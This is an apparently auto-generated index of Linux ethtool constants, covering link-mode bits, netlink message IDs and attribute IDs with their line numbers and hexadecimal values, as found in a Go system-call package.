ETHTOOL_LINK_MODE_10000baseSR_Full_BIT (line 3669) | ETHTOOL_LINK_MODE_10000baseSR_Full_BIT ... constant ETHTOOL_LINK_MODE_10000baseLR_Full_BIT (line 3670) | ETHTOOL_LINK_MODE_10000baseLR_Full_BIT ... constant ETHTOOL_LINK_MODE_10000baseLRM_Full_BIT (line 3671) | ETHTOOL_LINK_MODE_10000baseLRM_Full_BIT ... constant ETHTOOL_LINK_MODE_10000baseER_Full_BIT (line 3672) | ETHTOOL_LINK_MODE_10000baseER_Full_BIT ... constant ETHTOOL_LINK_MODE_2500baseT_Full_BIT (line 3673) | ETHTOOL_LINK_MODE_2500baseT_Full_BIT ... constant ETHTOOL_LINK_MODE_5000baseT_Full_BIT (line 3674) | ETHTOOL_LINK_MODE_5000baseT_Full_BIT ... constant ETHTOOL_LINK_MODE_FEC_NONE_BIT (line 3675) | ETHTOOL_LINK_MODE_FEC_NONE_BIT ... constant ETHTOOL_LINK_MODE_FEC_RS_BIT (line 3676) | ETHTOOL_LINK_MODE_FEC_RS_BIT ... constant ETHTOOL_LINK_MODE_FEC_BASER_BIT (line 3677) | ETHTOOL_LINK_MODE_FEC_BASER_BIT ... constant ETHTOOL_LINK_MODE_50000baseKR_Full_BIT (line 3678) | ETHTOOL_LINK_MODE_50000baseKR_Full_BIT ... constant ETHTOOL_LINK_MODE_50000baseSR_Full_BIT (line 3679) | ETHTOOL_LINK_MODE_50000baseSR_Full_BIT ... constant ETHTOOL_LINK_MODE_50000baseCR_Full_BIT (line 3680) | ETHTOOL_LINK_MODE_50000baseCR_Full_BIT ... constant ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT (line 3681) | ETHTOOL_LINK_MODE_50000baseLR_ER_FR_Full_BIT ... constant ETHTOOL_LINK_MODE_50000baseDR_Full_BIT (line 3682) | ETHTOOL_LINK_MODE_50000baseDR_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseKR2_Full_BIT (line 3683) | ETHTOOL_LINK_MODE_100000baseKR2_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseSR2_Full_BIT (line 3684) | ETHTOOL_LINK_MODE_100000baseSR2_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseCR2_Full_BIT (line 3685) | ETHTOOL_LINK_MODE_100000baseCR2_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseLR2_ER2_FR2_Full_BIT (line 3686) | ETHTOOL_LINK_MODE_100000baseLR2_ER2_FR2_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseDR2_Full_BIT (line 3687) | ETHTOOL_LINK_MODE_100000baseDR2_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseKR4_Full_BIT (line 3688) | ETHTOOL_LINK_MODE_200000baseKR4_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseSR4_Full_BIT (line 3689) | ETHTOOL_LINK_MODE_200000baseSR4_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseLR4_ER4_FR4_Full_BIT (line 3690) | ETHTOOL_LINK_MODE_200000baseLR4_ER4_FR4_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseDR4_Full_BIT (line 3691) | ETHTOOL_LINK_MODE_200000baseDR4_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseCR4_Full_BIT (line 3692) | ETHTOOL_LINK_MODE_200000baseCR4_Full_BIT ... constant ETHTOOL_LINK_MODE_100baseT1_Full_BIT (line 3693) | ETHTOOL_LINK_MODE_100baseT1_Full_BIT ... constant ETHTOOL_LINK_MODE_1000baseT1_Full_BIT (line 3694) | ETHTOOL_LINK_MODE_1000baseT1_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseKR8_Full_BIT (line 3695) | ETHTOOL_LINK_MODE_400000baseKR8_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseSR8_Full_BIT (line 3696) | ETHTOOL_LINK_MODE_400000baseSR8_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseLR8_ER8_FR8_Full_BIT (line 3697) | ETHTOOL_LINK_MODE_400000baseLR8_ER8_FR8_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseDR8_Full_BIT (line 3698) | ETHTOOL_LINK_MODE_400000baseDR8_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseCR8_Full_BIT (line 3699) | ETHTOOL_LINK_MODE_400000baseCR8_Full_BIT ... constant ETHTOOL_LINK_MODE_FEC_LLRS_BIT (line 3700) | ETHTOOL_LINK_MODE_FEC_LLRS_BIT ... constant ETHTOOL_LINK_MODE_100000baseKR_Full_BIT (line 3701) | ETHTOOL_LINK_MODE_100000baseKR_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseSR_Full_BIT (line 3702) | ETHTOOL_LINK_MODE_100000baseSR_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseLR_ER_FR_Full_BIT (line 3703) | ETHTOOL_LINK_MODE_100000baseLR_ER_FR_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseCR_Full_BIT (line 3704) | ETHTOOL_LINK_MODE_100000baseCR_Full_BIT ... constant ETHTOOL_LINK_MODE_100000baseDR_Full_BIT (line 3705) | ETHTOOL_LINK_MODE_100000baseDR_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseKR2_Full_BIT (line 3706) | ETHTOOL_LINK_MODE_200000baseKR2_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseSR2_Full_BIT (line 3707) | ETHTOOL_LINK_MODE_200000baseSR2_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseLR2_ER2_FR2_Full_BIT (line 3708) | ETHTOOL_LINK_MODE_200000baseLR2_ER2_FR2_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseDR2_Full_BIT (line 3709) | ETHTOOL_LINK_MODE_200000baseDR2_Full_BIT ... constant ETHTOOL_LINK_MODE_200000baseCR2_Full_BIT (line 3710) | ETHTOOL_LINK_MODE_200000baseCR2_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseKR4_Full_BIT (line 3711) | ETHTOOL_LINK_MODE_400000baseKR4_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseSR4_Full_BIT (line 3712) | ETHTOOL_LINK_MODE_400000baseSR4_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseLR4_ER4_FR4_Full_BIT (line 3713) | ETHTOOL_LINK_MODE_400000baseLR4_ER4_FR4_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseDR4_Full_BIT (line 3714) | ETHTOOL_LINK_MODE_400000baseDR4_Full_BIT ... constant ETHTOOL_LINK_MODE_400000baseCR4_Full_BIT (line 3715) | ETHTOOL_LINK_MODE_400000baseCR4_Full_BIT ... constant ETHTOOL_LINK_MODE_100baseFX_Half_BIT (line 3716) | ETHTOOL_LINK_MODE_100baseFX_Half_BIT ... constant ETHTOOL_LINK_MODE_100baseFX_Full_BIT (line 3717) | ETHTOOL_LINK_MODE_100baseFX_Full_BIT ... constant ETHTOOL_MSG_USER_NONE (line 3719) | ETHTOOL_MSG_USER_NONE = 0x0 constant ETHTOOL_MSG_STRSET_GET (line 3720) | ETHTOOL_MSG_STRSET_GET = 0x1 constant ETHTOOL_MSG_LINKINFO_GET (line 3721) | ETHTOOL_MSG_LINKINFO_GET = 0x2 constant ETHTOOL_MSG_LINKINFO_SET (line 3722) | ETHTOOL_MSG_LINKINFO_SET = 0x3 constant ETHTOOL_MSG_LINKMODES_GET (line 3723) | ETHTOOL_MSG_LINKMODES_GET = 0x4 constant ETHTOOL_MSG_LINKMODES_SET (line 3724) | ETHTOOL_MSG_LINKMODES_SET = 0x5 constant ETHTOOL_MSG_LINKSTATE_GET (line 3725) | ETHTOOL_MSG_LINKSTATE_GET = 0x6 constant ETHTOOL_MSG_DEBUG_GET (line 3726) | ETHTOOL_MSG_DEBUG_GET = 0x7 constant ETHTOOL_MSG_DEBUG_SET (line 3727) | ETHTOOL_MSG_DEBUG_SET = 0x8 constant ETHTOOL_MSG_WOL_GET (line 3728) | ETHTOOL_MSG_WOL_GET = 0x9 constant ETHTOOL_MSG_WOL_SET (line 3729) | ETHTOOL_MSG_WOL_SET = 0xa constant ETHTOOL_MSG_FEATURES_GET (line 3730) | ETHTOOL_MSG_FEATURES_GET = 0xb constant ETHTOOL_MSG_FEATURES_SET (line 3731) | ETHTOOL_MSG_FEATURES_SET = 0xc constant ETHTOOL_MSG_PRIVFLAGS_GET (line 3732) | ETHTOOL_MSG_PRIVFLAGS_GET = 0xd constant ETHTOOL_MSG_PRIVFLAGS_SET (line 3733) | ETHTOOL_MSG_PRIVFLAGS_SET = 0xe constant ETHTOOL_MSG_RINGS_GET (line 3734) | ETHTOOL_MSG_RINGS_GET = 0xf constant ETHTOOL_MSG_RINGS_SET (line 3735) | ETHTOOL_MSG_RINGS_SET = 0x10 constant ETHTOOL_MSG_CHANNELS_GET (line 3736) | ETHTOOL_MSG_CHANNELS_GET = 0x11 constant ETHTOOL_MSG_CHANNELS_SET (line 3737) | ETHTOOL_MSG_CHANNELS_SET = 0x12 constant ETHTOOL_MSG_COALESCE_GET (line 3738) | ETHTOOL_MSG_COALESCE_GET = 0x13 constant ETHTOOL_MSG_COALESCE_SET (line 3739) | ETHTOOL_MSG_COALESCE_SET = 0x14 constant ETHTOOL_MSG_PAUSE_GET (line 3740) | ETHTOOL_MSG_PAUSE_GET = 0x15 constant ETHTOOL_MSG_PAUSE_SET (line 3741) | ETHTOOL_MSG_PAUSE_SET = 0x16 constant ETHTOOL_MSG_EEE_GET (line 3742) | ETHTOOL_MSG_EEE_GET = 0x17 constant ETHTOOL_MSG_EEE_SET (line 3743) | ETHTOOL_MSG_EEE_SET = 0x18 constant ETHTOOL_MSG_TSINFO_GET (line 3744) | ETHTOOL_MSG_TSINFO_GET = 0x19 constant ETHTOOL_MSG_CABLE_TEST_ACT (line 3745) | ETHTOOL_MSG_CABLE_TEST_ACT = 0x1a constant ETHTOOL_MSG_CABLE_TEST_TDR_ACT (line 3746) | ETHTOOL_MSG_CABLE_TEST_TDR_ACT = 0x1b constant ETHTOOL_MSG_TUNNEL_INFO_GET (line 3747) | ETHTOOL_MSG_TUNNEL_INFO_GET = 0x1c constant ETHTOOL_MSG_FEC_GET (line 3748) | ETHTOOL_MSG_FEC_GET = 0x1d constant ETHTOOL_MSG_FEC_SET (line 3749) | ETHTOOL_MSG_FEC_SET = 0x1e constant ETHTOOL_MSG_MODULE_EEPROM_GET (line 3750) | ETHTOOL_MSG_MODULE_EEPROM_GET = 0x1f constant ETHTOOL_MSG_STATS_GET (line 3751) | ETHTOOL_MSG_STATS_GET = 0x20 constant ETHTOOL_MSG_PHC_VCLOCKS_GET (line 3752) | ETHTOOL_MSG_PHC_VCLOCKS_GET = 0x21 constant ETHTOOL_MSG_MODULE_GET (line 3753) | ETHTOOL_MSG_MODULE_GET = 0x22 constant ETHTOOL_MSG_MODULE_SET (line 3754) | ETHTOOL_MSG_MODULE_SET = 0x23 constant ETHTOOL_MSG_PSE_GET (line 3755) | ETHTOOL_MSG_PSE_GET = 0x24 constant ETHTOOL_MSG_PSE_SET (line 3756) | ETHTOOL_MSG_PSE_SET = 0x25 constant ETHTOOL_MSG_RSS_GET (line 3757) | ETHTOOL_MSG_RSS_GET = 0x26 constant ETHTOOL_MSG_USER_MAX (line 3758) | ETHTOOL_MSG_USER_MAX = 0x2b constant ETHTOOL_MSG_KERNEL_NONE (line 3759) | ETHTOOL_MSG_KERNEL_NONE = 0x0 constant ETHTOOL_MSG_STRSET_GET_REPLY (line 3760) | ETHTOOL_MSG_STRSET_GET_REPLY = 0x1 constant ETHTOOL_MSG_LINKINFO_GET_REPLY (line 3761) | ETHTOOL_MSG_LINKINFO_GET_REPLY = 0x2 constant ETHTOOL_MSG_LINKINFO_NTF (line 3762) | ETHTOOL_MSG_LINKINFO_NTF = 0x3 constant ETHTOOL_MSG_LINKMODES_GET_REPLY (line 3763) | ETHTOOL_MSG_LINKMODES_GET_REPLY = 0x4 constant ETHTOOL_MSG_LINKMODES_NTF (line 3764) | ETHTOOL_MSG_LINKMODES_NTF = 0x5 constant ETHTOOL_MSG_LINKSTATE_GET_REPLY (line 3765) | ETHTOOL_MSG_LINKSTATE_GET_REPLY = 0x6 constant ETHTOOL_MSG_DEBUG_GET_REPLY (line 3766) | ETHTOOL_MSG_DEBUG_GET_REPLY = 0x7 constant ETHTOOL_MSG_DEBUG_NTF (line 3767) | ETHTOOL_MSG_DEBUG_NTF = 0x8 constant ETHTOOL_MSG_WOL_GET_REPLY (line 3768) | ETHTOOL_MSG_WOL_GET_REPLY = 0x9 constant ETHTOOL_MSG_WOL_NTF (line 3769) | ETHTOOL_MSG_WOL_NTF = 0xa constant ETHTOOL_MSG_FEATURES_GET_REPLY (line 3770) | ETHTOOL_MSG_FEATURES_GET_REPLY = 0xb constant ETHTOOL_MSG_FEATURES_SET_REPLY (line 3771) | ETHTOOL_MSG_FEATURES_SET_REPLY = 0xc constant ETHTOOL_MSG_FEATURES_NTF (line 3772) | ETHTOOL_MSG_FEATURES_NTF = 0xd constant ETHTOOL_MSG_PRIVFLAGS_GET_REPLY (line 3773) | ETHTOOL_MSG_PRIVFLAGS_GET_REPLY = 0xe constant ETHTOOL_MSG_PRIVFLAGS_NTF (line 3774) | ETHTOOL_MSG_PRIVFLAGS_NTF = 0xf constant ETHTOOL_MSG_RINGS_GET_REPLY (line 3775) | ETHTOOL_MSG_RINGS_GET_REPLY = 0x10 constant ETHTOOL_MSG_RINGS_NTF (line 3776) | ETHTOOL_MSG_RINGS_NTF = 0x11 constant ETHTOOL_MSG_CHANNELS_GET_REPLY (line 3777) | ETHTOOL_MSG_CHANNELS_GET_REPLY = 0x12 constant ETHTOOL_MSG_CHANNELS_NTF (line 3778) | ETHTOOL_MSG_CHANNELS_NTF = 0x13 constant ETHTOOL_MSG_COALESCE_GET_REPLY (line 3779) | ETHTOOL_MSG_COALESCE_GET_REPLY = 0x14 constant ETHTOOL_MSG_COALESCE_NTF (line 3780) | ETHTOOL_MSG_COALESCE_NTF = 0x15 constant ETHTOOL_MSG_PAUSE_GET_REPLY (line 3781) | ETHTOOL_MSG_PAUSE_GET_REPLY = 0x16 constant ETHTOOL_MSG_PAUSE_NTF (line 3782) | ETHTOOL_MSG_PAUSE_NTF = 0x17 constant ETHTOOL_MSG_EEE_GET_REPLY (line 3783) | ETHTOOL_MSG_EEE_GET_REPLY = 0x18 constant ETHTOOL_MSG_EEE_NTF (line 3784) | ETHTOOL_MSG_EEE_NTF = 0x19 constant ETHTOOL_MSG_TSINFO_GET_REPLY (line 3785) | ETHTOOL_MSG_TSINFO_GET_REPLY = 0x1a constant ETHTOOL_MSG_CABLE_TEST_NTF (line 3786) | ETHTOOL_MSG_CABLE_TEST_NTF = 0x1b constant ETHTOOL_MSG_CABLE_TEST_TDR_NTF (line 3787) | ETHTOOL_MSG_CABLE_TEST_TDR_NTF = 0x1c constant ETHTOOL_MSG_TUNNEL_INFO_GET_REPLY (line 3788) | ETHTOOL_MSG_TUNNEL_INFO_GET_REPLY = 0x1d constant ETHTOOL_MSG_FEC_GET_REPLY (line 3789) | ETHTOOL_MSG_FEC_GET_REPLY = 0x1e constant ETHTOOL_MSG_FEC_NTF (line 3790) | ETHTOOL_MSG_FEC_NTF = 0x1f constant ETHTOOL_MSG_MODULE_EEPROM_GET_REPLY (line 3791) | ETHTOOL_MSG_MODULE_EEPROM_GET_REPLY = 0x20 constant ETHTOOL_MSG_STATS_GET_REPLY (line 3792) | ETHTOOL_MSG_STATS_GET_REPLY = 0x21 constant ETHTOOL_MSG_PHC_VCLOCKS_GET_REPLY (line 3793) | ETHTOOL_MSG_PHC_VCLOCKS_GET_REPLY = 0x22 constant ETHTOOL_MSG_MODULE_GET_REPLY (line 3794) | ETHTOOL_MSG_MODULE_GET_REPLY = 0x23 constant ETHTOOL_MSG_MODULE_NTF (line 3795) | ETHTOOL_MSG_MODULE_NTF = 0x24 constant ETHTOOL_MSG_PSE_GET_REPLY (line 3796) | ETHTOOL_MSG_PSE_GET_REPLY = 0x25 constant ETHTOOL_MSG_RSS_GET_REPLY (line 3797) | ETHTOOL_MSG_RSS_GET_REPLY = 0x26 constant ETHTOOL_MSG_KERNEL_MAX (line 3798) | ETHTOOL_MSG_KERNEL_MAX = 0x2b constant ETHTOOL_A_HEADER_UNSPEC (line 3799) | ETHTOOL_A_HEADER_UNSPEC = 0x0 constant ETHTOOL_A_HEADER_DEV_INDEX (line 3800) | ETHTOOL_A_HEADER_DEV_INDEX = 0x1 constant ETHTOOL_A_HEADER_DEV_NAME (line 3801) | ETHTOOL_A_HEADER_DEV_NAME = 0x2 constant ETHTOOL_A_HEADER_FLAGS (line 3802) | ETHTOOL_A_HEADER_FLAGS = 0x3 constant ETHTOOL_A_HEADER_MAX (line 3803) | ETHTOOL_A_HEADER_MAX = 0x3 constant ETHTOOL_A_BITSET_BIT_UNSPEC (line 3804) | ETHTOOL_A_BITSET_BIT_UNSPEC = 0x0 constant ETHTOOL_A_BITSET_BIT_INDEX (line 3805) | ETHTOOL_A_BITSET_BIT_INDEX = 0x1 constant ETHTOOL_A_BITSET_BIT_NAME (line 3806) | ETHTOOL_A_BITSET_BIT_NAME = 0x2 constant ETHTOOL_A_BITSET_BIT_VALUE (line 3807) | ETHTOOL_A_BITSET_BIT_VALUE = 0x3 constant ETHTOOL_A_BITSET_BIT_MAX (line 3808) | ETHTOOL_A_BITSET_BIT_MAX = 0x3 constant ETHTOOL_A_BITSET_BITS_UNSPEC (line 3809) | ETHTOOL_A_BITSET_BITS_UNSPEC = 0x0 constant ETHTOOL_A_BITSET_BITS_BIT (line 3810) | ETHTOOL_A_BITSET_BITS_BIT = 0x1 constant ETHTOOL_A_BITSET_BITS_MAX (line 3811) | ETHTOOL_A_BITSET_BITS_MAX = 0x1 constant ETHTOOL_A_BITSET_UNSPEC (line 3812) | ETHTOOL_A_BITSET_UNSPEC = 0x0 constant ETHTOOL_A_BITSET_NOMASK (line 3813) | ETHTOOL_A_BITSET_NOMASK = 0x1 constant ETHTOOL_A_BITSET_SIZE (line 3814) | ETHTOOL_A_BITSET_SIZE = 0x2 constant ETHTOOL_A_BITSET_BITS (line 3815) | ETHTOOL_A_BITSET_BITS = 0x3 constant ETHTOOL_A_BITSET_VALUE (line 3816) | ETHTOOL_A_BITSET_VALUE = 0x4 constant ETHTOOL_A_BITSET_MASK (line 3817) | ETHTOOL_A_BITSET_MASK = 0x5 constant ETHTOOL_A_BITSET_MAX (line 3818) | ETHTOOL_A_BITSET_MAX = 0x5 constant ETHTOOL_A_STRING_UNSPEC (line 3819) | ETHTOOL_A_STRING_UNSPEC = 0x0 constant ETHTOOL_A_STRING_INDEX (line 3820) | ETHTOOL_A_STRING_INDEX = 0x1 constant ETHTOOL_A_STRING_VALUE (line 3821) | ETHTOOL_A_STRING_VALUE = 0x2 constant ETHTOOL_A_STRING_MAX (line 3822) | ETHTOOL_A_STRING_MAX = 0x2 constant ETHTOOL_A_STRINGS_UNSPEC (line 3823) | ETHTOOL_A_STRINGS_UNSPEC = 0x0 constant ETHTOOL_A_STRINGS_STRING (line 3824) | ETHTOOL_A_STRINGS_STRING = 0x1 constant ETHTOOL_A_STRINGS_MAX (line 3825) | ETHTOOL_A_STRINGS_MAX = 0x1 constant ETHTOOL_A_STRINGSET_UNSPEC (line 3826) | ETHTOOL_A_STRINGSET_UNSPEC = 0x0 constant ETHTOOL_A_STRINGSET_ID (line 3827) | ETHTOOL_A_STRINGSET_ID = 0x1 constant ETHTOOL_A_STRINGSET_COUNT (line 3828) | ETHTOOL_A_STRINGSET_COUNT = 0x2 constant ETHTOOL_A_STRINGSET_STRINGS (line 3829) | ETHTOOL_A_STRINGSET_STRINGS = 0x3 constant ETHTOOL_A_STRINGSET_MAX (line 3830) | ETHTOOL_A_STRINGSET_MAX = 0x3 constant ETHTOOL_A_STRINGSETS_UNSPEC (line 3831) | ETHTOOL_A_STRINGSETS_UNSPEC = 0x0 constant ETHTOOL_A_STRINGSETS_STRINGSET (line 3832) | ETHTOOL_A_STRINGSETS_STRINGSET = 0x1 constant ETHTOOL_A_STRINGSETS_MAX (line 3833) | ETHTOOL_A_STRINGSETS_MAX = 0x1 constant ETHTOOL_A_STRSET_UNSPEC (line 3834) | ETHTOOL_A_STRSET_UNSPEC = 0x0 constant ETHTOOL_A_STRSET_HEADER (line 3835) | ETHTOOL_A_STRSET_HEADER = 0x1 constant ETHTOOL_A_STRSET_STRINGSETS (line 3836) | ETHTOOL_A_STRSET_STRINGSETS = 0x2 constant ETHTOOL_A_STRSET_COUNTS_ONLY (line 3837) | ETHTOOL_A_STRSET_COUNTS_ONLY = 0x3 constant ETHTOOL_A_STRSET_MAX (line 3838) | ETHTOOL_A_STRSET_MAX = 0x3 constant ETHTOOL_A_LINKINFO_UNSPEC (line 3839) | ETHTOOL_A_LINKINFO_UNSPEC = 0x0 constant ETHTOOL_A_LINKINFO_HEADER (line 3840) | ETHTOOL_A_LINKINFO_HEADER = 0x1 constant ETHTOOL_A_LINKINFO_PORT (line 3841) | ETHTOOL_A_LINKINFO_PORT = 0x2 constant ETHTOOL_A_LINKINFO_PHYADDR (line 3842) | ETHTOOL_A_LINKINFO_PHYADDR = 0x3 constant ETHTOOL_A_LINKINFO_TP_MDIX (line 3843) | ETHTOOL_A_LINKINFO_TP_MDIX = 0x4 constant ETHTOOL_A_LINKINFO_TP_MDIX_CTRL (line 3844) | ETHTOOL_A_LINKINFO_TP_MDIX_CTRL = 0x5 constant ETHTOOL_A_LINKINFO_TRANSCEIVER (line 3845) | ETHTOOL_A_LINKINFO_TRANSCEIVER = 0x6 constant ETHTOOL_A_LINKINFO_MAX (line 3846) | ETHTOOL_A_LINKINFO_MAX = 0x6 constant ETHTOOL_A_LINKMODES_UNSPEC (line 3847) | ETHTOOL_A_LINKMODES_UNSPEC = 0x0 constant ETHTOOL_A_LINKMODES_HEADER (line 3848) | ETHTOOL_A_LINKMODES_HEADER = 0x1 constant ETHTOOL_A_LINKMODES_AUTONEG (line 3849) | ETHTOOL_A_LINKMODES_AUTONEG = 0x2 constant ETHTOOL_A_LINKMODES_OURS (line 3850) | ETHTOOL_A_LINKMODES_OURS = 0x3 constant ETHTOOL_A_LINKMODES_PEER (line 3851) | ETHTOOL_A_LINKMODES_PEER = 0x4 constant ETHTOOL_A_LINKMODES_SPEED (line 3852) | ETHTOOL_A_LINKMODES_SPEED = 0x5 constant ETHTOOL_A_LINKMODES_DUPLEX (line 3853) | ETHTOOL_A_LINKMODES_DUPLEX = 0x6 constant ETHTOOL_A_LINKMODES_MASTER_SLAVE_CFG (line 3854) | ETHTOOL_A_LINKMODES_MASTER_SLAVE_CFG = 0x7 constant ETHTOOL_A_LINKMODES_MASTER_SLAVE_STATE (line 3855) | ETHTOOL_A_LINKMODES_MASTER_SLAVE_STATE = 0x8 constant ETHTOOL_A_LINKMODES_LANES (line 3856) | ETHTOOL_A_LINKMODES_LANES = 0x9 constant ETHTOOL_A_LINKMODES_RATE_MATCHING (line 3857) | ETHTOOL_A_LINKMODES_RATE_MATCHING = 0xa constant ETHTOOL_A_LINKMODES_MAX (line 3858) | ETHTOOL_A_LINKMODES_MAX = 0xa constant ETHTOOL_A_LINKSTATE_UNSPEC (line 3859) | ETHTOOL_A_LINKSTATE_UNSPEC = 0x0 constant ETHTOOL_A_LINKSTATE_HEADER (line 3860) | ETHTOOL_A_LINKSTATE_HEADER = 0x1 constant ETHTOOL_A_LINKSTATE_LINK (line 3861) | ETHTOOL_A_LINKSTATE_LINK = 0x2 constant ETHTOOL_A_LINKSTATE_SQI (line 3862) | ETHTOOL_A_LINKSTATE_SQI = 0x3 constant ETHTOOL_A_LINKSTATE_SQI_MAX (line 3863) | ETHTOOL_A_LINKSTATE_SQI_MAX = 0x4 constant ETHTOOL_A_LINKSTATE_EXT_STATE (line 3864) | ETHTOOL_A_LINKSTATE_EXT_STATE = 0x5 constant ETHTOOL_A_LINKSTATE_EXT_SUBSTATE (line 3865) | ETHTOOL_A_LINKSTATE_EXT_SUBSTATE = 0x6 constant ETHTOOL_A_LINKSTATE_EXT_DOWN_CNT (line 3866) | ETHTOOL_A_LINKSTATE_EXT_DOWN_CNT = 0x7 constant ETHTOOL_A_LINKSTATE_MAX (line 3867) | ETHTOOL_A_LINKSTATE_MAX = 0x7 constant ETHTOOL_A_DEBUG_UNSPEC (line 3868) | ETHTOOL_A_DEBUG_UNSPEC = 0x0 constant ETHTOOL_A_DEBUG_HEADER (line 3869) | ETHTOOL_A_DEBUG_HEADER = 0x1 constant ETHTOOL_A_DEBUG_MSGMASK (line 3870) | ETHTOOL_A_DEBUG_MSGMASK = 0x2 constant ETHTOOL_A_DEBUG_MAX (line 3871) | ETHTOOL_A_DEBUG_MAX = 0x2 constant ETHTOOL_A_WOL_UNSPEC (line 3872) | ETHTOOL_A_WOL_UNSPEC = 0x0 constant ETHTOOL_A_WOL_HEADER (line 3873) | ETHTOOL_A_WOL_HEADER = 0x1 constant ETHTOOL_A_WOL_MODES (line 3874) | ETHTOOL_A_WOL_MODES = 0x2 constant ETHTOOL_A_WOL_SOPASS (line 3875) | ETHTOOL_A_WOL_SOPASS = 0x3 constant ETHTOOL_A_WOL_MAX (line 3876) | ETHTOOL_A_WOL_MAX = 0x3 constant ETHTOOL_A_FEATURES_UNSPEC (line 3877) | ETHTOOL_A_FEATURES_UNSPEC = 0x0 constant ETHTOOL_A_FEATURES_HEADER (line 3878) | ETHTOOL_A_FEATURES_HEADER = 0x1 constant ETHTOOL_A_FEATURES_HW (line 3879) | ETHTOOL_A_FEATURES_HW = 0x2 constant ETHTOOL_A_FEATURES_WANTED (line 3880) | ETHTOOL_A_FEATURES_WANTED = 0x3 constant ETHTOOL_A_FEATURES_ACTIVE (line 3881) | ETHTOOL_A_FEATURES_ACTIVE = 0x4 constant ETHTOOL_A_FEATURES_NOCHANGE (line 3882) | ETHTOOL_A_FEATURES_NOCHANGE = 0x5 constant ETHTOOL_A_FEATURES_MAX (line 3883) | ETHTOOL_A_FEATURES_MAX = 0x5 constant ETHTOOL_A_PRIVFLAGS_UNSPEC (line 3884) | ETHTOOL_A_PRIVFLAGS_UNSPEC = 0x0 constant ETHTOOL_A_PRIVFLAGS_HEADER (line 3885) | ETHTOOL_A_PRIVFLAGS_HEADER = 0x1 constant ETHTOOL_A_PRIVFLAGS_FLAGS (line 3886) | ETHTOOL_A_PRIVFLAGS_FLAGS = 0x2 constant ETHTOOL_A_PRIVFLAGS_MAX (line 3887) | ETHTOOL_A_PRIVFLAGS_MAX = 0x2 constant ETHTOOL_A_RINGS_UNSPEC (line 3888) | ETHTOOL_A_RINGS_UNSPEC = 0x0 constant ETHTOOL_A_RINGS_HEADER (line 3889) | ETHTOOL_A_RINGS_HEADER = 0x1 constant ETHTOOL_A_RINGS_RX_MAX (line 3890) | ETHTOOL_A_RINGS_RX_MAX = 0x2 constant ETHTOOL_A_RINGS_RX_MINI_MAX (line 3891) | ETHTOOL_A_RINGS_RX_MINI_MAX = 0x3 constant ETHTOOL_A_RINGS_RX_JUMBO_MAX (line 3892) | ETHTOOL_A_RINGS_RX_JUMBO_MAX = 0x4 constant ETHTOOL_A_RINGS_TX_MAX (line 3893) | ETHTOOL_A_RINGS_TX_MAX = 0x5 constant ETHTOOL_A_RINGS_RX (line 3894) | ETHTOOL_A_RINGS_RX = 0x6 constant ETHTOOL_A_RINGS_RX_MINI (line 3895) | ETHTOOL_A_RINGS_RX_MINI = 0x7 constant ETHTOOL_A_RINGS_RX_JUMBO (line 3896) | ETHTOOL_A_RINGS_RX_JUMBO = 0x8 constant ETHTOOL_A_RINGS_TX (line 3897) | ETHTOOL_A_RINGS_TX = 0x9 constant ETHTOOL_A_RINGS_RX_BUF_LEN (line 3898) | ETHTOOL_A_RINGS_RX_BUF_LEN = 0xa constant ETHTOOL_A_RINGS_TCP_DATA_SPLIT (line 3899) | ETHTOOL_A_RINGS_TCP_DATA_SPLIT = 0xb constant ETHTOOL_A_RINGS_CQE_SIZE (line 3900) | ETHTOOL_A_RINGS_CQE_SIZE = 0xc constant ETHTOOL_A_RINGS_TX_PUSH (line 3901) | ETHTOOL_A_RINGS_TX_PUSH = 0xd constant ETHTOOL_A_RINGS_MAX (line 3902) | ETHTOOL_A_RINGS_MAX = 0x10 constant ETHTOOL_A_CHANNELS_UNSPEC (line 3903) | ETHTOOL_A_CHANNELS_UNSPEC = 0x0 constant ETHTOOL_A_CHANNELS_HEADER (line 3904) | ETHTOOL_A_CHANNELS_HEADER = 0x1 constant ETHTOOL_A_CHANNELS_RX_MAX (line 3905) | ETHTOOL_A_CHANNELS_RX_MAX = 0x2 constant ETHTOOL_A_CHANNELS_TX_MAX (line 3906) | ETHTOOL_A_CHANNELS_TX_MAX = 0x3 constant ETHTOOL_A_CHANNELS_OTHER_MAX (line 3907) | ETHTOOL_A_CHANNELS_OTHER_MAX = 0x4 constant ETHTOOL_A_CHANNELS_COMBINED_MAX (line 3908) | ETHTOOL_A_CHANNELS_COMBINED_MAX = 0x5 constant ETHTOOL_A_CHANNELS_RX_COUNT (line 3909) | ETHTOOL_A_CHANNELS_RX_COUNT = 0x6 constant ETHTOOL_A_CHANNELS_TX_COUNT (line 3910) | ETHTOOL_A_CHANNELS_TX_COUNT = 0x7 constant ETHTOOL_A_CHANNELS_OTHER_COUNT (line 3911) | ETHTOOL_A_CHANNELS_OTHER_COUNT = 0x8 constant ETHTOOL_A_CHANNELS_COMBINED_COUNT (line 3912) | ETHTOOL_A_CHANNELS_COMBINED_COUNT = 0x9 constant ETHTOOL_A_CHANNELS_MAX (line 3913) | ETHTOOL_A_CHANNELS_MAX = 0x9 constant 